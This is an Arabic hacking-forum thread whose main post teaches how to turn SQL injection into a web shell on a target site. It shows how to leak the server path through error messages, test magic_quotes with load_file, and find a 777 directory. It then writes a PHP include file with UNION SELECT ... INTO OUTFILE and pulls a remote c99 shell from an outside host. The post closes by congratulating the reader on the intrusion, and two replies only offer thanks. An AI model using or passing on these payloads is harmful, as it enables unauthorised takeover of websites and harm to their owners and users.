Sql injection tutorial for zaina

Sql injection tutorial for zaina


النتائج 1 إلى 3 من 3

الموضوع: Sql injection tutorial for zaina

  1. #1
    هكر نشيط
    تاريخ التسجيل
    Sep 2010
    الدولة
    أجمل البلدان المغرب
    المشاركات
    177

    Gadid Sql injection tutorial for zaina

    السلام عليكم و رحمة الله تعلى و بركاته
    -أرجو أن تكونوا في تمام الصحة و العافية-

    في الكثير من الحالات نستطيع حقن الموقع لكن لا نجد الأدمن و الباس
    أو يكون الباس غير قابل للكسر
    أو نجدها ولا نجد مسار لوحة التحكم
    أو يكون الموقع محمي بجدار ناري

    أردت أن أضيف لكم معلومة ( للذين لا يعرفونها )
    نستطيع أن نرفع شل من حقنة السيكول
    و الطريقة كالتالي :
    أولا :
    يجب أن نعرف مسارنا على السرفر
    و يجب أن يكون magic quotes=OFF الماجيك كويتس أوف
    --------------------------------------------------------------------
    بعدما استخرجنا عدد الأعمدة و عرفنا المصاب منها
    -------------------------------------------------------------------
    لنعرف مسارنا عى السرفر ستعمل نفس طريقة معرفة الموقع مصاب بثغرة sql أي نضيف '
    و سيضهر لنا مسارنا على السرفر مع جملة الخطأ
    -----------------
    مثال:
    Warning: mysql_fetch_array(): supplied argument is not a valid MySQL result resource in /home/dudi/public_html/katava.php on line 2
    هذه جملة خطأ
    ومسارنا فيها..
    و هو /home/dudi/public_html/ طبعا لا نحتسب الصفحة الأخيرة ي الصابة لأنها ليست ب مجلد
    المهم نحفظ المسار و نتابع
    ---------------
    الآن نأتي لكيفية معرفة الmagic quotes on أو off
    لهذا الغرض نستبدل أحد الأعمدة المصابة طبعا في أمر معرفة الأعمدة المصابة
    ب load_file('/')
    أي سيكون الإستغلال هكذا
    نفترض أن عدد الأعمدة هو 9 و العمود 4 مصاب
    http://www.target.com/file.php?id=-1...39,5,6,7,8,9
    و نرى
    إذا ضهرت الصفحة نفسها التي تضهر عند طلب الأعمدة المصابة فهذا يعني أن الmagic quotes off
    و نستطيع مواصلة عملنا
    أما إذا كان ال magic quotes on
    فسوف يضهر لنا خطأ سيكول ولا نستطيع رفع الشل في هذه الحالة
    ------------------------------
    طيب ضهر لنا الmagic quotes off ماذا نفعل ؟
    -----------------------------
    نبحث عن أي شيئ مصرح بتصريح 777
    -----------------------------
    و ذلك بمحاولة الحصول على مسار أي صورة أو فيديو أو صوت في الصفحة الحالية
    مثلا هذا مسار صورة www.target.com/images/image.jpg
    أي سيكون مسار الملف المصرح هو /images/
    الذي يأتي بعد مسارنا على السرفر طبعا
    ---------------------------------
    نضع هذا الكود في مكان العمود المصاب الذي هو 4 في حالتنا هذه
    '<?include("$iraq"); ?>'
    و نضيف هذا الأمر في آخر السطر
    into+outfile+
    ثم نضيف مسارنا على السرفر الذي هو في هذه الحالة
    home/dudi/public_html/
    ثم نضيف مسار الملف المصرح ب777
    /images/
    ثم اسم الملف المصاب المراد رفعه بإمتداد php
    مثلا example.php
    ------------------
    ليكون الاستغلال كتالي

    PHP CODE
    www.target.com/file.php?id=-1+union+select+1,2,3,'<?include("$iraq"); ?>',5,6,7,8,9+into+outfile"/home/dudi/public_html/images/example.php

    الآن تم إشائ الملف المقصود و هو هنا

    www.target.com/images/example.php
    الآن المرحلة الأخيرة هي رفع الشل على صيغة txt

    وذلك بالتالي
    كود PHP:
    http://www.target.com/images/example...xt.tc/c99.txt?
    طبعا http://c99.txt.tc/c99.txt
    هو مسار الشل بصيغة txt مرفوع جاهز
    و ألف مبروك على الإختراق-----

  2. #2
    هكر نشيط
    تاريخ التسجيل
    Sep 2010
    الدولة
    أجمل البلدان المغرب
    المشاركات
    177

    افتراضي رد: Sql injection tutorial for zaina

    تقيما من البرد

  3. #3
    هكر متميز الصورة الرمزية hooos
    تاريخ التسجيل
    Jul 2010
    الدولة
    في كوكب لوحدي
    المشاركات
    1,878

    افتراضي رد: Sql injection tutorial for zaina

    مشكور والله يعطيك العافيه

المواضيع المتشابهه

  1. كيف يتم اختراق المواقع او المنتديات او السيرفرات zaina
    بواسطة zaina في المنتدى اختراق المواقع والسيرفرات
    مشاركات: 13
    آخر مشاركة: 01-27-2012, 09:44 PM
  2. اختراق عن طريق ثغره zaina admincp
    بواسطة zaina في المنتدى اختراق المواقع والسيرفرات
    مشاركات: 6
    آخر مشاركة: 08-20-2011, 09:48 PM
  3. شرح اختراق المواقع سهل جدا للمبتدئين zaina
    بواسطة zaina في المنتدى اختراق المواقع والسيرفرات
    مشاركات: 5
    آخر مشاركة: 01-16-2011, 03:40 PM
  4. ثغره ممتاازه للمبتدئين zaina
    بواسطة zaina في المنتدى اختراق المواقع والسيرفرات
    مشاركات: 1
    آخر مشاركة: 12-05-2010, 06:31 AM
  5. ثغرت الفرنت بيج من zaina
    بواسطة zaina في المنتدى اختراق المواقع والسيرفرات
    مشاركات: 1
    آخر مشاركة: 12-05-2010, 01:10 AM

الكلمات الدلالية لهذا الموضوع

المفضلات

أذونات المشاركة

  • لا تستطيع إضافة مواضيع جديدة
  • لا تستطيع الرد على المواضيع
  • لا تستطيع إرفاق ملفات
  • لا تستطيع تعديل مشاركاتك
  •